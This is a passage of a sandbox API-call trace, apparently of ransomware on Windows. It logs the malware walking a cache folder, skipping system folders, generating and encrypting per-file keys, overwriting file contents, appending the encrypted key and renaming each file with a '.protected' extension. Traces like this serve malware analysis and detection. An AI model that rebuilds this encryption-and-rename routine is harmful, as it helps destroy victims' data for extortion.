hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ed, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ed, lpOverlapped=0x0) returned 1 [0088.750] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.750] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.750] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.750] CloseHandle (hObject=0x150) returned 1 [0088.750] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected") returned 161 [0088.750] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\BC570EC0DE58335AFAF92FDC8E3AA330_F4D449CA9E0EACCFE15946F8FCD349FC.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\bc570ec0de58335afaf92fdc8e3aa330_f4d449ca9e0eaccfe15946f8fcd349fc.protected")) returned 1 [0088.751] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: 
lpFindFileData=0x295e7d0) returned 1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Windows") returned -1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files") returned -1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="Program Files (x86)") returned -1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="$Recycle.bin") returned 1 [0088.751] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="System Volume Information") returned -1 [0088.751] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.751] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".protected") returned 0x0 [0088.751] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpString2="RESTORE_FILES.txt") returned -1 [0088.751] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.751] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.751] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.755] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".txt") returned 0x0 [0088.755] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.762] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".rar") returned 0x0 [0088.762] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873") returned 151 [0088.762] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873", lpSrch=".zip") returned 0x0 [0088.762] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.763] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.764] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.764] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.764] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, 
nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.764] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.764] CloseHandle (hObject=0x150) returned 1 [0088.764] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected") returned 161 [0088.764] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_42820CDFEA41DC84AAB89A6B63561873.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_42820cdfea41dc84aab89a6b63561873.protected")) returned 1 [0088.765] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Windows") returned -1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="Program Files") returned -1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", 
lpString2="Program Files (x86)") returned -1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="$Recycle.bin") returned 1 [0088.765] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="System Volume Information") returned -1 [0088.765] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.765] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".protected") returned 0x0 [0088.765] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpString2="RESTORE_FILES.txt") returned -1 [0088.765] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.766] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.766] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.766] StrStrW 
(lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".txt") returned 0x0 [0088.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.766] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".rar") returned 0x0 [0088.766] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE") returned 151 [0088.766] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE", lpSrch=".zip") returned 0x0 [0088.766] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.790] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.790] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.790] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.790] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.790] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, 
lpOverlapped=0x0) returned 1 [0088.790] CloseHandle (hObject=0x150) returned 1 [0088.790] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected") returned 161 [0088.790] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_6043FC604A395E1485AF7AC16D16B7CE.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_6043fc604a395e1485af7ac16d16b7ce.protected")) returned 1 [0088.791] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.791] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Windows") returned -1 [0088.791] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files") returned -1 [0088.791] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="Program Files (x86)") returned -1 [0088.792] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="$Recycle.bin") returned 1 [0088.792] lstrcmpiW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="System Volume Information") returned -1 [0088.792] wnsprintfW (in: pszDest=0x4dfbb0, 
cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.792] StrStrIW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".protected") returned 0x0 [0088.792] lstrcmpW (lpString1="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpString2="RESTORE_FILES.txt") returned -1 [0088.792] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.792] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.792] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.792] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.792] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".txt") returned 0x0 [0088.792] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.793] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", 
lpSrch=".rar") returned 0x0 [0088.793] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF") returned 151 [0088.793] StrStrW (lpFirst="C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF", lpSrch=".zip") returned 0x0 [0088.793] ReadFile (in: hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.806] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffff91d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.806] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x6e3, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x6e3, lpOverlapped=0x0) returned 1 [0088.806] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.806] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.806] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.806] CloseHandle (hObject=0x150) returned 1 [0088.806] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected") returned 161 [0088.806] MoveFileW 
(lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\C46E7B0F942663A1EDC8D9D6D7869173_D9B9F37ECE595B0B7B6AA12451D392CF.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\c46e7b0f942663a1edc8d9d6d7869173_d9b9f37ece595b0b7b6aa12451d392cf.protected")) returned 1 [0088.812] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Windows") returned -1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files") returned -1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="Program Files (x86)") returned -1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="$Recycle.bin") returned 1 [0088.813] lstrcmpiW (lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="System Volume Information") returned -1 [0088.813] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.813] StrStrIW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".protected") returned 0x0 [0088.813] lstrcmpW 
(lpString1="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpString2="RESTORE_FILES.txt") returned -1 [0088.813] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0088.813] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0088.813] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\microsoft\\cryptneturlcache\\content\\d47dbd2f9e3365fbbe008d71fb06716f_4dd1053bcc726da41115fff4c7d6e9cc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.814] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".txt") returned 0x0 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.814] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".rar") returned 0x0 [0088.814] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC") returned 151 [0088.814] StrStrW (lpFirst="D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC", lpSrch=".zip") returned 0x0 [0088.814] ReadFile (in: 
hFile=0x150, lpBuffer=0x4a3468, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesRead=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.817] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffa52, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0088.817] WriteFile (in: hFile=0x150, lpBuffer=0x4a3468*, nNumberOfBytesToWrite=0x5ae, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4a3468*, lpNumberOfBytesWritten=0x295e7b4*=0x5ae, lpOverlapped=0x0) returned 1 [0088.817] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0088.818] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0088.818] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0088.818] CloseHandle (hObject=0x150) returned 1 [0088.818] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content\\D47DBD2F9E3365FBBE008D71FB06716F_4DD1053BCC726DA41115FFF4C7D6E9CC.protected") returned 161 [0088.818] MoveFileW 